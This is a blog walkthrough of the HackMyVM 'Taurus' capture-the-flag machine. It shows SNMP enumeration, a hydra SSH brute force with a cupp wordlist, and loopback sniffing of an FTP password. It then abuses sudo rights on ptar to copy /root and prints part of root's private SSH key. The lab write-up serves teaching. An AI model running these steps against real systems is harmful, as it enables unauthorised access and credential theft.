Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Taurus Walkthrough

HackMyVm Taurus Walkthrough


Keypoints: generate custom dic, tcpdump, IPv6

https://hackmyvm.eu/machines/machine.php?vm=Taurus


Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 PORT   STATE    SERVICE VERSION
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 PORT    STATE         SERVICE
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp


Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public 192.168.56.100    
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
 iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
 iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
 ...


Here is the tricky part.  In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

 ~ cupp -i         
  ___________                                                                              
    cupp.py!                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                             [ Mebus | https://github.com/Mebus/]
 
 
 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)
 
 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):
 ...


Successfully get the password of sarah.

 ~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100   ssh -t64 -F 
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
 [DATA] attacking ssh://192.168.56.100:22/
 [22][ssh] host: 192.168.56.100   login: sarah   password: Sarah_2012
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26


In sarah's home folder, found a file default.tar, which is unreadable now.

 sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority


Check sudo -l of user.

 sarah@taurus:~$ sudo -l
 Matching Defaults entries for sarah on taurus:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User sarah may run the following commands on taurus:
     (marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp


Try to run it.  The ftp port opened and closed again quickly.

 sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.


Open another ssh terminal, run tcpdump to get data.

 sarah@taurus:~$ tcpdump -i lo  -nn -A
 ...
 17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
 615192936], length 34: FTP: 331 Password required for marion
 `....B.@.....................................H*9.........J.....
 .{wh.{wh331 Password required for marion
 
 17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
 length 0
 `.EX. .@.........................................H*[.....(.....
 .{wh.{wh
 17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
 615192936], length 18: FTP: PASS ilovesushis
 ...


Escalate to user marion, check sudo -l again.

 sarah@taurus:~$ su marion
 Password:
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar


Use ptar to pack /root/ to /tmp/, then extract it use tar.

 marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
 /root
 /root/.bashrc
 /root/root.txt
 /root/.profile
 /root/.bash_history
 /root/.local
 /root/.local/share
 /root/.local/share/nano
 /root/.ssh
 /root/.ssh/authorized_keys
 /root/.ssh/id_rsa
 marion@taurus:/tmp$ tar -xvf root.tar -C ./
 tar: Removing leading `//' from member names
 //root
 tar: Removing leading `/' from member names
 /root/.bashrc
 /root/root.txt
 /root/.profile
 /root/.bash_history
 /root/.local
 /root/.local/share
 /root/.local/share/nano
 /root/.ssh
 /root/.ssh/authorized_keys
 /root/.ssh/id_rsa
 marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
 e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
 ...
 


Get root with ssh.

 marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa 
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 taurus




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1